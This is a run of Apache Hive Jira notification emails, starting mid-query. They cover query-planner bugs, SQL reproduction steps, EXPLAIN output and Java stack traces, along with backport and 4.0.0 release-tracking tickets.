cmv_basetable_n6.a, cmv_basetable_2_n3.c FROM cmv_basetable_n6 JOIN cmv_basetable_2_n3 ON (cmv_basetable_n6.a = cmv_basetable_2_n3.a) WHERE cmv_basetable_2_n3.c > 10.0;{code} !截图9.PNG! h1. Note This issue is also seen in update-incurred inserts/deletes. -- This message was sent by Atlassian Jira (v8.20.10#820010)
[jira] [Commented] (HIVE-21660) Wrong result when union all and later view with explode is used
[ https://issues.apache.org/jira/browse/HIVE-21660?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel=17791864#comment-17791864 ] Chunhui Yang commented on HIVE-21660: - But I use Hive-2.3.9 and run with MapReduce not Tez,also face this question.Can I edit GenTezUtils.java to fix this bug? > Wrong result when union all and later view with explode is used > --- > > Key: HIVE-21660 > URL: https://issues.apache.org/jira/browse/HIVE-21660 > Project: Hive > Issue Type: Bug > Components: Physical Optimizer >Affects Versions: 3.1.1 >Reporter: Ganesha Shreedhara >Assignee: Ganesha Shreedhara >Priority: Major > Fix For: 4.0.0-alpha-1 > > Attachments: HIVE-21660.1.patch, HIVE-21660.2.patch, HIVE-21660.patch > > > There is a data loss when the data is inserted to a partitioned table using > union all and lateral view with explode. > > *Steps to reproduce:* > > {code:java} > create table t1 (id int, dt string); > insert into t1 values (2, '2019-04-01'); > create table t2( id int, dates array); > insert into t2 select 1 as id, array('2019-01-01','2019-01-02','2019-01-03') > as dates; > create table dst (id int) partitioned by (dt string); > set hive.exec.dynamic.partition.mode=nonstrict; > set hive.exec.dynamic.partition=true; > insert overwrite table dst partition (dt) > select t.id, t.dt from ( > select id, dt from t1 > union all > select id, dts as dt from t2 tt2 lateral view explode(tt2.dates) dd as dts ) > t; > select * from dst; > {code} > > > *Actual Result:* > {code:java} > +--+--+ > | 2| 2019-04-01 | > +--+--+{code} > > *Expected Result* (Run only the select part from the above insert query)*:* > {code:java} > +---++ > | 2 | 2019-04-01 | > | 1 | 2019-01-01 | > | 1 | 2019-01-02 | > | 1 | 2019-01-03 | > +---++{code} > > Data retrieved using union all and lateral view with explode from second > table is missing. -- This message was sent by Atlassian Jira (v8.20.10#820010)
[jira] [Updated] (HIVE-27923) Query fails with SemanticException if column referenced with name in ORDER by
[ https://issues.apache.org/jira/browse/HIVE-27923?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] Riju Trivedi updated HIVE-27923: Description: Query fails with 'Invalid column reference' error if the column in Order by clause is not referenced similar to Group By clause. Like below 2 queries will compile correctly but the third one will fail. {code:java} CREATE VIEW view_order_by_test AS SELECT to_date(`order_by_test`.`result_date`) AS `process_date`,COUNT AS `count` FROM `order_by_test` GROUP BY to_date(`order_by_test`.`result_date`) ORDER BY to_date(`order_by_test`.`result_date`) DESC; ---Successful CREATE VIEW view_order_by_test AS SELECT to_date(`result_date`) AS `process_date`,COUNT AS `count` FROM `order_by_test` GROUP BY to_date(`result_date`) ORDER BY to_date(`result_date`) DESC; --Successful CREATE VIEW view_order_by_test AS SELECT to_date(`order_by_test`.`result_date`) AS `process_date`,COUNT AS `count` FROM `order_by_test` GROUP BY to_date(`order_by_test`.`result_date`) ORDER BY to_date(`result_date`) DESC; --Failure {code} Both column name and alias use should be supported for "ORDER BY" clause. was: Query fails with 'Invalid column reference' error if the column in Order by clause is not referenced similar to Group By clause. Like below 2 queries will compile correctly but the third one will fail. CREATE VIEW view_order_by_test AS SELECT to_date(`order_by_test`.`result_date`) AS `process_date`,COUNT(*) AS `count` FROM `order_by_test` GROUP BY to_date(`order_by_test`.`result_date`) ORDER BY to_date(`order_by_test`.`result_date`) DESC; ---Successful CREATE VIEW view_order_by_test AS SELECT to_date(`result_date`) AS `process_date`,COUNT(*) AS `count` FROM `order_by_test` GROUP BY to_date(`result_date`) ORDER BY to_date(`result_date`) DESC; --Successful CREATE VIEW view_order_by_test AS SELECT to_date(`order_by_test`.`result_date`) AS `process_date`,COUNT(*) AS `count` FROM `order_by_test` GROUP BY to_date(`order_by_test`.`result_date`) ORDER BY to_date(`result_date`) DESC; --Failure > Query fails with SemanticException if column referenced with name in ORDER by > > --- > > Key: HIVE-27923 > URL: https://issues.apache.org/jira/browse/HIVE-27923 > Project: Hive > Issue Type: Bug > Components: Logical Optimizer >Reporter: Riju Trivedi >Priority: Major > > Query fails with 'Invalid column reference' error if the column in Order by > clause is not referenced similar to Group By clause. Like below 2 queries > will compile correctly but the third one will fail. > {code:java} > CREATE VIEW view_order_by_test AS SELECT > to_date(`order_by_test`.`result_date`) AS `process_date`,COUNT AS `count` > FROM `order_by_test` > GROUP BY to_date(`order_by_test`.`result_date`) > ORDER BY to_date(`order_by_test`.`result_date`) DESC; > ---Successful > CREATE VIEW view_order_by_test AS SELECT to_date(`result_date`) AS > `process_date`,COUNT AS `count` > FROM `order_by_test` > GROUP BY to_date(`result_date`) > ORDER BY to_date(`result_date`) DESC; > --Successful > CREATE VIEW view_order_by_test AS SELECT > to_date(`order_by_test`.`result_date`) AS `process_date`,COUNT AS `count` > FROM `order_by_test` > GROUP BY to_date(`order_by_test`.`result_date`) > ORDER BY to_date(`result_date`) DESC; > --Failure > {code} > Both column name and alias use should be supported for "ORDER BY" clause. > -- This message was sent by Atlassian Jira (v8.20.10#820010)
[jira] [Created] (HIVE-27923) Query fails with SemanticException if column referenced with name in ORDER by
Riju Trivedi created HIVE-27923: --- Summary: Query fails with SemanticException if column referenced with name in ORDER by Key: HIVE-27923 URL: https://issues.apache.org/jira/browse/HIVE-27923 Project: Hive Issue Type: Bug Components: Logical Optimizer Reporter: Riju Trivedi Query fails with 'Invalid column reference' error if the column in Order by clause is not referenced similar to Group By clause. Like below 2 queries will compile correctly but the third one will fail. CREATE VIEW view_order_by_test AS SELECT to_date(`order_by_test`.`result_date`) AS `process_date`,COUNT(*) AS `count` FROM `order_by_test` GROUP BY to_date(`order_by_test`.`result_date`) ORDER BY to_date(`order_by_test`.`result_date`) DESC; ---Successful CREATE VIEW view_order_by_test AS SELECT to_date(`result_date`) AS `process_date`,COUNT(*) AS `count` FROM `order_by_test` GROUP BY to_date(`result_date`) ORDER BY to_date(`result_date`) DESC; --Successful CREATE VIEW view_order_by_test AS SELECT to_date(`order_by_test`.`result_date`) AS `process_date`,COUNT(*) AS `count` FROM `order_by_test` GROUP BY to_date(`order_by_test`.`result_date`) ORDER BY to_date(`result_date`) DESC; --Failure -- This message was sent by Atlassian Jira (v8.20.10#820010)
[jira] [Updated] (HIVE-27922) Backport HMS client changes from HIVE-18755
[ https://issues.apache.org/jira/browse/HIVE-27922?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] ASF GitHub Bot updated HIVE-27922: -- Labels: pull-request-available (was: ) > Backport HMS client changes from HIVE-18755 > --- > > Key: HIVE-27922 > URL: https://issues.apache.org/jira/browse/HIVE-27922 > Project: Hive > Issue Type: Improvement >Reporter: Chao Sun >Priority: Major > Labels: pull-request-available > > This is a follow-up on HIVE-27868 to backport HMS client changes related to > the catalog support. -- This message was sent by Atlassian Jira (v8.20.10#820010)
[jira] [Created] (HIVE-27922) Backport HMS client changes from HIVE-18755
Chao Sun created HIVE-27922: --- Summary: Backport HMS client changes from HIVE-18755 Key: HIVE-27922 URL: https://issues.apache.org/jira/browse/HIVE-27922 Project: Hive Issue Type: Improvement Reporter: Chao Sun This is a follow-up on HIVE-27868 to backport HMS client changes related to the catalog support. -- This message was sent by Atlassian Jira (v8.20.10#820010)
[jira] [Resolved] (HIVE-27868) Backport a subset of HIVE-18755 to branch-2.3 to support reading from catalog in HMS 3+
[ https://issues.apache.org/jira/browse/HIVE-27868?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] Chao Sun resolved HIVE-27868. - Fix Version/s: 2.3.10 Assignee: Chao Sun Resolution: Fixed > Backport a subset of HIVE-18755 to branch-2.3 to support reading from catalog > in HMS 3+ > --- > > Key: HIVE-27868 > URL: https://issues.apache.org/jira/browse/HIVE-27868 > Project: Hive > Issue Type: Improvement >Reporter: Chao Sun >Assignee: Chao Sun >Priority: Major > Labels: pull-request-available > Fix For: 2.3.10 > > > HIVE-18755 introduced the concept of catalog which adds another level of > namespace on top of tables and databases. Given HMS using Hive 3.x already > has this feature and Hive 2.3 client is commonly used to talk to these > metastores through frameworks such as Spark, this JIRA proposes to backport a > subset of the features to allow Hive 2.3 client to specify catalog to read > from the 3.x metastores. -- This message was sent by Atlassian Jira (v8.20.10#820010)
[jira] [Updated] (HIVE-27921) Prepare for Hive 4.0.0 Release
[ https://issues.apache.org/jira/browse/HIVE-27921?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] Denys Kuzmenko updated HIVE-27921: -- Component/s: Hive > Prepare for Hive 4.0.0 Release > -- > > Key: HIVE-27921 > URL: https://issues.apache.org/jira/browse/HIVE-27921 > Project: Hive > Issue Type: Task > Components: Hive >Affects Versions: 4.0.0 >Reporter: Denys Kuzmenko >Priority: Major > > That is an Umbrella Jira to track the activity around Hive 4.0.0 release. > *Please note that this is an Open forum and every input from the community is > welcomed.* -- This message was sent by Atlassian Jira (v8.20.10#820010)
[jira] [Updated] (HIVE-27921) Prepare for Hive 4.0.0 Release
[ https://issues.apache.org/jira/browse/HIVE-27921?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] Denys Kuzmenko updated HIVE-27921: -- Description: That is an Umbrella Jira to track the activity around Hive 4.0.0 release. *Please note that this is an Open forum and every input from the community is welcomed.* > Prepare for Hive 4.0.0 Release > -- > > Key: HIVE-27921 > URL: https://issues.apache.org/jira/browse/HIVE-27921 > Project: Hive > Issue Type: Improvement >Reporter: Denys Kuzmenko >Priority: Major > > That is an Umbrella Jira to track the activity around Hive 4.0.0 release. > *Please note that this is an Open forum and every input from the community is > welcomed.* -- This message was sent by Atlassian Jira (v8.20.10#820010)
[jira] [Updated] (HIVE-27921) Prepare for Hive 4.0.0 Release
[ https://issues.apache.org/jira/browse/HIVE-27921?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] Denys Kuzmenko updated HIVE-27921: -- Affects Version/s: 4.0.0 > Prepare for Hive 4.0.0 Release > -- > > Key: HIVE-27921 > URL: https://issues.apache.org/jira/browse/HIVE-27921 > Project: Hive > Issue Type: Task >Affects Versions: 4.0.0 >Reporter: Denys Kuzmenko >Priority: Major > > That is an Umbrella Jira to track the activity around Hive 4.0.0 release. > *Please note that this is an Open forum and every input from the community is > welcomed.* -- This message was sent by Atlassian Jira (v8.20.10#820010)
[jira] [Updated] (HIVE-27921) Prepare for Hive 4.0.0 Release
[ https://issues.apache.org/jira/browse/HIVE-27921?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] Denys Kuzmenko updated HIVE-27921: -- Issue Type: Task (was: Improvement) > Prepare for Hive 4.0.0 Release > -- > > Key: HIVE-27921 > URL: https://issues.apache.org/jira/browse/HIVE-27921 > Project: Hive > Issue Type: Task >Reporter: Denys Kuzmenko >Priority: Major > > That is an Umbrella Jira to track the activity around Hive 4.0.0 release. > *Please note that this is an Open forum and every input from the community is > welcomed.* -- This message was sent by Atlassian Jira (v8.20.10#820010)
[jira] [Created] (HIVE-27921) Prepare for Hive 4.0.0 Release
Denys Kuzmenko created HIVE-27921: - Summary: Prepare for Hive 4.0.0 Release Key: HIVE-27921 URL: https://issues.apache.org/jira/browse/HIVE-27921 Project: Hive Issue Type: Improvement Reporter: Denys Kuzmenko -- This message was sent by Atlassian Jira (v8.20.10#820010)
[jira] [Resolved] (HIVE-26630) Introduce copy-on-write DML implementations for Iceberg tables
[ https://issues.apache.org/jira/browse/HIVE-26630?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] Denys Kuzmenko resolved HIVE-26630. --- Fix Version/s: 4.0.0 Assignee: Denys Kuzmenko (was: Ayush Saxena) Resolution: Fixed > Introduce copy-on-write DML implementations for Iceberg tables > -- > > Key: HIVE-26630 > URL: https://issues.apache.org/jira/browse/HIVE-26630 > Project: Hive > Issue Type: Improvement >Reporter: Ádám Szita >Assignee: Denys Kuzmenko >Priority: Major > Fix For: 4.0.0 > > > Hive currently only supports merge-on-read approach when doing > delete/update/merge operations on Iceberg tables. From performance point of > view this has the advantage on the write side and disadvantage on the read > side. > We should create a copy-on-write implementation for these where the pro's and > con's are inverted which might suite better certain use cases. -- This message was sent by Atlassian Jira (v8.20.10#820010)
[jira] [Created] (HIVE-27920) Failed to generate OPTIMIZED SQL when running EXPLAIN EXTENDED on query with TO_DATE function
Stamatis Zampetakis created HIVE-27920: -- Summary: Failed to generate OPTIMIZED SQL when running EXPLAIN EXTENDED on query with TO_DATE function Key: HIVE-27920 URL: https://issues.apache.org/jira/browse/HIVE-27920 Project: Hive Issue Type: Bug Components: CBO Affects Versions: 4.0.0-beta-1 Reporter: Stamatis Zampetakis Assignee: Stamatis Zampetakis The problem can be reproduced in current master using the following scenario. {code:sql} CREATE TABLE TBL (STRING_DATE STRING); EXPLAIN EXTENDED SELECT TO_DATE(STRING_DATE) FROM TBL; {code} The OPTIMIZED SQL entry is missing from the output of the EXPLAIN. {noformat} STAGE DEPENDENCIES: Stage-0 is a root stage STAGE PLANS: Stage: Stage-0 Fetch Operator limit: -1 Processor Tree: TableScan alias: tbl GatherStats: false Select Operator expressions: to_date(CAST( string_date AS TIMESTAMP)) (type: date) outputColumnNames: _col0 ListSink {noformat} The OPTIMIZED SQL is missing cause the conversion from the CBO plan (RelNode) to SQL failed with the following stacktrace. {noformat} 2023-11-30T07:11:34,486 WARN [ebc7347a-5ea2-49dc-88c8-61b25804e066 main] parse.CalcitePlanner: Rel2SQL Rewrite threw error java.lang.UnsupportedOperationException: class org.apache.calcite.sql.SqlSyntax$6: SPECIAL at org.apache.calcite.util.Util.needToImplement(Util.java:975) ~[hive-exec-4.0.0-beta-2-SNAPSHOT.jar:4.0.0-beta-2-SNAPSHOT] at org.apache.calcite.sql.SqlSyntax$6.unparse(SqlSyntax.java:116) ~[hive-exec-4.0.0-beta-2-SNAPSHOT.jar:4.0.0-beta-2-SNAPSHOT] at org.apache.calcite.sql.SqlOperator.unparse(SqlOperator.java:329) ~[hive-exec-4.0.0-beta-2-SNAPSHOT.jar:4.0.0-beta-2-SNAPSHOT] at org.apache.calcite.sql.SqlDialect.unparseCall(SqlDialect.java:453) ~[hive-exec-4.0.0-beta-2-SNAPSHOT.jar:4.0.0-beta-2-SNAPSHOT] at org.apache.calcite.sql.dialect.HiveSqlDialect.unparseCall(HiveSqlDialect.java:108) ~[hive-exec-4.0.0-beta-2-SNAPSHOT.jar:4.0.0-beta-2-SNAPSHOT] at org.apache.calcite.sql.SqlCall.unparse(SqlCall.java:104) ~[hive-exec-4.0.0-beta-2-SNAPSHOT.jar:4.0.0-beta-2-SNAPSHOT] at org.apache.calcite.sql.SqlAsOperator.unparse(SqlAsOperator.java:76) ~[hive-exec-4.0.0-beta-2-SNAPSHOT.jar:4.0.0-beta-2-SNAPSHOT] at org.apache.calcite.sql.SqlDialect.unparseCall(SqlDialect.java:453) ~[hive-exec-4.0.0-beta-2-SNAPSHOT.jar:4.0.0-beta-2-SNAPSHOT] at org.apache.calcite.sql.dialect.HiveSqlDialect.unparseCall(HiveSqlDialect.java:112) ~[hive-exec-4.0.0-beta-2-SNAPSHOT.jar:4.0.0-beta-2-SNAPSHOT] at org.apache.calcite.sql.SqlCall.unparse(SqlCall.java:104) ~[hive-exec-4.0.0-beta-2-SNAPSHOT.jar:4.0.0-beta-2-SNAPSHOT] at org.apache.calcite.sql.pretty.SqlPrettyWriter$FrameImpl.list2(SqlPrettyWriter.java:1291) ~[hive-exec-4.0.0-beta-2-SNAPSHOT.jar:4.0.0-beta-2-SNAPSHOT] at org.apache.calcite.sql.pretty.SqlPrettyWriter$FrameImpl.list(SqlPrettyWriter.java:1271) ~[hive-exec-4.0.0-beta-2-SNAPSHOT.jar:4.0.0-beta-2-SNAPSHOT] at org.apache.calcite.sql.pretty.SqlPrettyWriter.list(SqlPrettyWriter.java:1068) ~[hive-exec-4.0.0-beta-2-SNAPSHOT.jar:4.0.0-beta-2-SNAPSHOT] at org.apache.calcite.sql.SqlSelectOperator.unparse(SqlSelectOperator.java:164) ~[hive-exec-4.0.0-beta-2-SNAPSHOT.jar:4.0.0-beta-2-SNAPSHOT] at org.apache.calcite.sql.SqlDialect.unparseCall(SqlDialect.java:453) ~[hive-exec-4.0.0-beta-2-SNAPSHOT.jar:4.0.0-beta-2-SNAPSHOT] at org.apache.calcite.sql.dialect.HiveSqlDialect.unparseCall(HiveSqlDialect.java:112) ~[hive-exec-4.0.0-beta-2-SNAPSHOT.jar:4.0.0-beta-2-SNAPSHOT] at org.apache.calcite.sql.SqlSelect.unparse(SqlSelect.java:246) ~[hive-exec-4.0.0-beta-2-SNAPSHOT.jar:4.0.0-beta-2-SNAPSHOT] at org.apache.calcite.sql.SqlNode.toSqlString(SqlNode.java:152) ~[hive-exec-4.0.0-beta-2-SNAPSHOT.jar:4.0.0-beta-2-SNAPSHOT] at org.apache.calcite.sql.SqlNode.toSqlString(SqlNode.java:174) ~[hive-exec-4.0.0-beta-2-SNAPSHOT.jar:4.0.0-beta-2-SNAPSHOT] at org.apache.calcite.sql.SqlNode.toSqlString(SqlNode.java:183) ~[hive-exec-4.0.0-beta-2-SNAPSHOT.jar:4.0.0-beta-2-SNAPSHOT] at org.apache.hadoop.hive.ql.parse.CalcitePlanner.getOptimizedSql(CalcitePlanner.java:1367) ~[hive-exec-4.0.0-beta-2-SNAPSHOT.jar:4.0.0-beta-2-SNAPSHOT] at org.apache.hadoop.hive.ql.parse.CalcitePlanner.genOPTree(CalcitePlanner.java:660) ~[hive-exec-4.0.0-beta-2-SNAPSHOT.jar:4.0.0-beta-2-SNAPSHOT] at org.apache.hadoop.hive.ql.parse.SemanticAnalyzer.analyzeInternal(SemanticAnalyzer.java:13113) ~[hive-exec-4.0.0-beta-2-SNAPSHOT.jar:4.0.0-beta-2-SNAPSHOT] at org.apache.hadoop.hive.ql.parse.CalcitePlanner.analyzeInternal(CalcitePlanner.java:465)
[jira] [Created] (HIVE-27919) Constant reduction in CBO does not work for FROM_UNIXTIME, DATE_ADD, DATE_SUB
Stamatis Zampetakis created HIVE-27919: -- Summary: Constant reduction in CBO does not work for FROM_UNIXTIME, DATE_ADD, DATE_SUB Key: HIVE-27919 URL: https://issues.apache.org/jira/browse/HIVE-27919 Project: Hive Issue Type: Improvement Components: CBO Affects Versions: 4.0.0-beta-1 Reporter: Stamatis Zampetakis Assignee: Stamatis Zampetakis Constant reduction (aka. constant folding) does not work in CBO for FROM_UNIXTIME, DATE_ADD, and DATE_SUB functions. Below, we outline the result of EXPLAIN CBO and plain EXPLAIN using some trivial constant inputs. Notice, that constant reduction is not present in the CBO plan but it is applied later on by the physical optimizer. {code:sql} SELECT FROM_UNIXTIME(1701088643) {code} {noformat} CBO PLAN: HiveProject(_o__c0=[FROM_UNIXTIME(1701088643)]) HiveTableScan(table=[[_dummy_database, _dummy_table]], table:alias=[_dummy_table]) STAGE PLANS: Stage: Stage-0 Fetch Operator limit: -1 Processor Tree: TableScan alias: _dummy_table Row Limit Per Split: 1 Select Operator expressions: '2023-11-27 04:37:23' (type: string) outputColumnNames: _col0 ListSink {noformat} {code:sql} SELECT DATE_ADD('2023-01-01', 1) {code} {noformat} CBO PLAN: HiveProject(_o__c0=[DATE_ADD(_UTF-16LE'2023-01-01':VARCHAR(2147483647) CHARACTER SET "UTF-16LE", 1)]) HiveTableScan(table=[[_dummy_database, _dummy_table]], table:alias=[_dummy_table]) STAGE PLANS: Stage: Stage-0 Fetch Operator limit: -1 Processor Tree: TableScan alias: _dummy_table Row Limit Per Split: 1 Select Operator expressions: DATE'2023-01-02' (type: date) outputColumnNames: _col0 ListSink {noformat} {code:sql} SELECT DATE_SUB('2023-01-01', 1) {code} {noformat} CBO PLAN: HiveProject(_o__c0=[DATE_SUB(_UTF-16LE'2023-01-01':VARCHAR(2147483647) CHARACTER SET "UTF-16LE", 1)]) HiveTableScan(table=[[_dummy_database, _dummy_table]], table:alias=[_dummy_table]) STAGE PLANS: Stage: Stage-0 Fetch Operator limit: -1 Processor Tree: TableScan alias: _dummy_table Row Limit Per Split: 1 Select Operator expressions: DATE'2022-12-31' (type: date) outputColumnNames: _col0 ListSink {noformat} The reason is that all the functions at the moment extend {{SqlAbstractTimeFunction}} which is declared as a dynamic function and by default prevents constant folding. -- This message was sent by Atlassian Jira (v8.20.10#820010)
[jira] [Updated] (HIVE-1626) stop using java.util.Stack
[ https://issues.apache.org/jira/browse/HIVE-1626?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] Chunhui Yang updated HIVE-1626: --- Description: 我们目前使用 Stack 作为通用节点遍历库的一部分。不应将 Stack 用于此目的,因为它从 Vector 继承会产生多余的同步开销。 大多数项目最终都会添加一个 ArrayStack 实现并改用它。 was: We currently use Stack as part of the generic node walking library. Stack should not be used for this since its inheritance from Vector incurs superfluous synchronization overhead. Most projects end up adding an ArrayStack implementation and using that instead. > stop using java.util.Stack > -- > > Key: HIVE-1626 > URL: https://issues.apache.org/jira/browse/HIVE-1626 > Project: Hive > Issue Type: Improvement > Components: Query Processor >Affects Versions: 0.7.0 >Reporter: John Sichi >Assignee: Teddy Choi >Priority: Major > Labels: pull-request-available > Attachments: HIVE-1626.2.patch, HIVE-1626.2.patch, HIVE-1626.3.patch, > HIVE-1626.3.patch, HIVE-1626.3.patch > > Time Spent: 2h 40m > Remaining Estimate: 0h > > 我们目前使用 Stack 作为通用节点遍历库的一部分。不应将 Stack 用于此目的,因为它从 Vector 继承会产生多余的同步开销。 > 大多数项目最终都会添加一个 ArrayStack 实现并改用它。 -- This message was sent by Atlassian Jira (v8.20.10#820010)
[jira] [Commented] (HIVE-27658) Error resolving join keys during conversion to dynamic partition hashjoin
[ https://issues.apache.org/jira/browse/HIVE-27658?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel=17791647#comment-17791647 ] Stamatis Zampetakis commented on HIVE-27658: For convenience, the query in [^hive27658.q] is presented below. {code:sql} SELECT TC.CONST_DATE, TB.PRODUCT_SK FROM TABLE_A TA INNER JOIN (SELECT TO_DATE(FROM_UNIXTIME(1701088643)) AS CONST_DATE) TC ON TA.START_DATE = TC.CONST_DATE INNER JOIN TABLE_B TB ON TB.START_DATE = TC.CONST_DATE AND TA.PRODUCT_ID = TB.PRODUCT_ID;{code} The operator tree before hitting the error described above is depicted in [^hive27658-query-plan.pdf]. The problem is triggered while trying to convert the JOIN[14] operator into a dynamic partition hash join. The dynamic partition hash join is the first operator that appears in a Reduce Operator Tree and the plan usually looks like the snippet below. {noformat} Reduce Operator Tree: Map Join Operator condition map: Inner Join 0 to 1 keys: 0 KEY.reducesinkkey0 (type: bigint), KEY.reducesinkkey1 (type: bigint) 1 KEY.reducesinkkey0 (type: bigint), KEY.reducesinkkey1 (type: bigint) outputColumnNames: _col2, _col5, _col7, _col9, _col15 input vertices: 0 Map 1 Statistics: Num rows: 1178531569624 Data size: 414666308907440 Basic stats: COMPLETE Column stats: COMPLETE DynamicPartitionHashJoin: true {noformat} Observe that the column names for the keys are using the "KEY.reducesinkkey" prefix and the implementation depends on this naming convention for working properly. The {{ExprNodeDescUtils#resolveJoinKeysAsRSColumns}} method tries to map the join keys to the output column names from the RS operators using the {{columnExprMap}} mapping that is present on the RS operators. In this case, it fails to resolve the "0 _col1 (type:int), _col2 (type: date)" keys from the RS[12] operator because "_col2 (type: date)" is not present in the {{columnExprMap}} of RS[12] thus it returns {{null}} and triggers the aforementioned exception. Looking closer to RS[12] we can see that there is a slight inconsistency between the columnExprMap and the key expressions. The KEY.reducesinkkey1 denotes that the input expression is a constant date but this is not reflected in the key expressions where _col2 is an expression referencing a column. It appears the constant propagation logic did not trigger completely for RS[12] leaving it to some intermediary state that is problematic for the dynamic partition hash join conversion. > Error resolving join keys during conversion to dynamic partition hashjoin > - > > Key: HIVE-27658 > URL: https://issues.apache.org/jira/browse/HIVE-27658 > Project: Hive > Issue Type: Bug > Components: Query Planning >Affects Versions: 3.1.3, 4.0.0-beta-1 >Reporter: xiaojunxiang >Priority: Major > Attachments: hive27658-query-plan.pdf, hive27658.q > > > In certain cases the compilation of queries fail during the conversion to a > dynamic partition hash join with the stacktrace similar to the one shown > below. > {noformat} > 2023-08-31T10:22:21,738 WARN [HiveServer2-Handler-Pool: Thread-100]: > thrift.ThriftCLIService (()) - Error executing statement: > org.apache.hive.service.cli.HiveSQLException: Error while compiling > statement: FAILED: SemanticException Error resolving join keys > at > org.apache.hive.service.cli.operation.Operation.toSQLException(Operation.java:335) > ~[hive-service-100.jar:?] > at > org.apache.hive.service.cli.operation.SQLOperation.prepare(SQLOperation.java:199) > ~[hive-service-100.jar:?] > at > org.apache.hive.service.cli.operation.SQLOperation.runInternal(SQLOperation.java:260) > ~[hive-service-100.jar:?] > at > org.apache.hive.service.cli.operation.Operation.run(Operation.java:247) > ~[hive-service-100.jar:?] > at > org.apache.hive.service.cli.session.HiveSessionImpl.executeStatementInternal(HiveSessionImpl.java:541) > ~[hive-service-100.jar:?] > at > org.apache.hive.service.cli.session.HiveSessionImpl.executeStatementAsync(HiveSessionImpl.java:527) > ~[hive-service-100.jar:?] > at > org.apache.hive.service.cli.CLIService.executeStatementAsync(CLIService.java:312) > ~[hive-service-100.jar:?] > at > org.apache.hive.service.cli.thrift.ThriftCLIService.ExecuteStatement(ThriftCLIService.java:562) > ~[hive-service-100.jar:?] > at > org.apache.hive.service.rpc.thrift.TCLIService$Processor$ExecuteStatement.getResult(TCLIService.java:1557) > ~[hive-exec-100.jar:?] > at > org.apache.hive.service.rpc.thrift.TCLIService$Processor$ExecuteStatement.getResult(TCLIService.java:1542) > ~[hive-exec-100.jar:?] > at org.apache.thrift.ProcessFunction.process(ProcessFunction.java:39) >
[jira] [Updated] (HIVE-27658) Error resolving join keys during conversion to dynamic partition hashjoin
[ https://issues.apache.org/jira/browse/HIVE-27658?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] Stamatis Zampetakis updated HIVE-27658: --- Attachment: hive27658-query-plan.pdf > Error resolving join keys during conversion to dynamic partition hashjoin > - > > Key: HIVE-27658 > URL: https://issues.apache.org/jira/browse/HIVE-27658 > Project: Hive > Issue Type: Bug > Components: Query Planning >Affects Versions: 3.1.3, 4.0.0-beta-1 >Reporter: xiaojunxiang >Priority: Major > Attachments: hive27658-query-plan.pdf, hive27658.q > > > In certain cases the compilation of queries fail during the conversion to a > dynamic partition hash join with the stacktrace similar to the one shown > below. > {noformat} > 2023-08-31T10:22:21,738 WARN [HiveServer2-Handler-Pool: Thread-100]: > thrift.ThriftCLIService (()) - Error executing statement: > org.apache.hive.service.cli.HiveSQLException: Error while compiling > statement: FAILED: SemanticException Error resolving join keys > at > org.apache.hive.service.cli.operation.Operation.toSQLException(Operation.java:335) > ~[hive-service-100.jar:?] > at > org.apache.hive.service.cli.operation.SQLOperation.prepare(SQLOperation.java:199) > ~[hive-service-100.jar:?] > at > org.apache.hive.service.cli.operation.SQLOperation.runInternal(SQLOperation.java:260) > ~[hive-service-100.jar:?] > at > org.apache.hive.service.cli.operation.Operation.run(Operation.java:247) > ~[hive-service-100.jar:?] > at > org.apache.hive.service.cli.session.HiveSessionImpl.executeStatementInternal(HiveSessionImpl.java:541) > ~[hive-service-100.jar:?] > at > org.apache.hive.service.cli.session.HiveSessionImpl.executeStatementAsync(HiveSessionImpl.java:527) > ~[hive-service-100.jar:?] > at > org.apache.hive.service.cli.CLIService.executeStatementAsync(CLIService.java:312) > ~[hive-service-100.jar:?] > at > org.apache.hive.service.cli.thrift.ThriftCLIService.ExecuteStatement(ThriftCLIService.java:562) > ~[hive-service-100.jar:?] > at > org.apache.hive.service.rpc.thrift.TCLIService$Processor$ExecuteStatement.getResult(TCLIService.java:1557) > ~[hive-exec-100.jar:?] > at > org.apache.hive.service.rpc.thrift.TCLIService$Processor$ExecuteStatement.getResult(TCLIService.java:1542) > ~[hive-exec-100.jar:?] > at org.apache.thrift.ProcessFunction.process(ProcessFunction.java:39) > ~[hive-exec-100.jar:?] > at org.apache.thrift.TBaseProcessor.process(TBaseProcessor.java:39) > ~[hive-exec-100.jar:?] > at > org.apache.hadoop.hive.metastore.security.HadoopThriftAuthBridge$Server$TUGIAssumingProcessor.process(HadoopThriftAuthBridge.java:647) > ~[hive-exec-100.jar:?] > at > org.apache.thrift.server.TThreadPoolServer$WorkerProcess.run(TThreadPoolServer.java:286) > ~[hive-exec-100.jar:?] > at > java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1149) > ~[?:1.8.0_312] > at > java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:624) > ~[?:1.8.0_312] > at java.lang.Thread.run(Thread.java:748) [?:1.8.0_312] > Caused by: org.apache.hadoop.hive.ql.parse.SemanticException: Error resolving > join keys > at > org.apache.hadoop.hive.ql.optimizer.MapJoinProcessor.getMapJoinDesc(MapJoinProcessor.java:1105) > ~[hive-exec-100.jar:?] > at > org.apache.hadoop.hive.ql.optimizer.MapJoinProcessor.convertJoinOpMapJoinOp(MapJoinProcessor.java:372) > ~[hive-exec-100.jar:?] > at > org.apache.hadoop.hive.ql.optimizer.ConvertJoinMapJoin.convertJoinMapJoin(ConvertJoinMapJoin.java:1056) > ~[hive-exec-100.jar:?] > at > org.apache.hadoop.hive.ql.optimizer.ConvertJoinMapJoin.convertJoinDynamicPartitionedHashJoin(ConvertJoinMapJoin.java:1280) > ~[hive-exec-100.jar:?] > at > org.apache.hadoop.hive.ql.optimizer.ConvertJoinMapJoin.fallbackToReduceSideJoin(ConvertJoinMapJoin.java:1312) > ~[hive-exec-100.jar:?] > at > 